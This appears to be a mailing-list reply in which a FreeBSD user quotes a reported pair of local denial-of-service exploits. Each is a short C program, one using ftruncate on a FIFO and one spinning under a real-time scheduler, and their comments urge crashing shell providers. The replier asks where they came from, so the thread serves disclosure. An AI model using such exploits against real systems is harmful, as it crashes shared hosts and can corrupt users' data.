> I'm not sure if this is the address I shuold be contacting, although
> I feel this is severely important...

Where did this come from?  Is this a recent CVS checkout?  From which
server?  May want to followup on [EMAIL PROTECTED]

>   1.. /* FreeBSD cvs commit: src/sys/ufs/ufs/ufs_vnops.c maxim 2006-05-31
> 13:15:29 UTC
>   2..    Log: According to POSIX, the result of ftruncate(2) is unspecified
>   3..    for file types other than VREG, VDIR and shared memory objects.
>   4..    We already handle VREG, VLNK and VDIR cases.  Silently ignore
>   5..    truncate requests for all the rest. PR kern/98064
>   6..
>   7..    lol lol, thatz true. [EMAIL PROTECTED] lolling it out in '06
> !"#%&%(20061013)(="#"!
>   8..    tested on FreeBSD 6.0-RELEASE-p5, 6.1-RELEASE-p10 (latest at the
> time of writing)
>   9..    - it just makes the system reboot, and with a bit of luck fucks up
> the filesystem.
>   10..    wow, that sort of makes this 0day local freebsd denial of service
> for non-CURRENT or whatever.
>   11..    usage: ./run me and wait a moment.. woo, it's friday the 13th, go
> crash some shell providers.
>   12..
>   13.. */
>   14..
>   15.. #include <fcntl.h>
>   16.. #include <unistd.h>
>   17.. #include <sys/types.h>
>   18.. #include <sys/stat.h>
>   19..
>   20.. int main(){
>   21.. mkfifo("lol",0x1b6);
>   22.. int fd = open("lol",O_RDWR);
>   23.. ftruncate(fd,12345);
>   24.. close(fd);
>   25.. }
>
>   1.. /* FreeBSD cvs commit: src/sys/posix4/p1003_1b.c davidxu 2006-05-21
> 00:40:38 UTC
>   b..
>   3..    Log: Don't allow non-root user to set a scheduler policy, otherwise
> this could be a local DOS.
>   4..    lol lol, thatz true. [EMAIL PROTECTED] lolling it out in '06
> !"#%&%(20061013)(="#"!
>   5..    tested on FreeBSD 5.5-RELEASE, 6.0-RELEASE-p5, 6.1-RELEASE,
> 6.1-RELEASE-p10 (latest at the time of writing)
>   6..    wow, that sort of makes this 0day local freebsd denial of service
> for non-CURRENT or whatever.
>   7..    usage: ./run me and wait a moment.. woo, it's friday the 13th, go
> crash some shell providers.
>   8.. */
>   9.. #include <sched.h>
>   10.. int main(){
>   11.. struct sched_param lol;
>   12.. lol.sched_priority = sched_get_priority_max(SCHED_FIFO);
>   13.. sched_setscheduler(0,SCHED_FIFO,&lol);
>   14.. for(;;){}
>   15.. }

Bill Moran
Collaborative Fusion Inc.

IMPORTANT: This message contains confidential information and is
intended only for the individual named. If the reader of this
message is not an intended recipient (or the individual
responsible for the delivery of this message to an intended
recipient), please be advised that any re-use, dissemination,
distribution or copying of this message is prohibited. Please
notify the sender immediately by e-mail if you have received
this e-mail by mistake and delete this e-mail from your system.
E-mail transmission cannot be guaranteed to be secure or
destroyed, arrive late or incomplete, or contain viruses. The
sender therefore does not accept liability for any errors or
omissions in the contents of this message, which arise as a
result of e-mail transmission.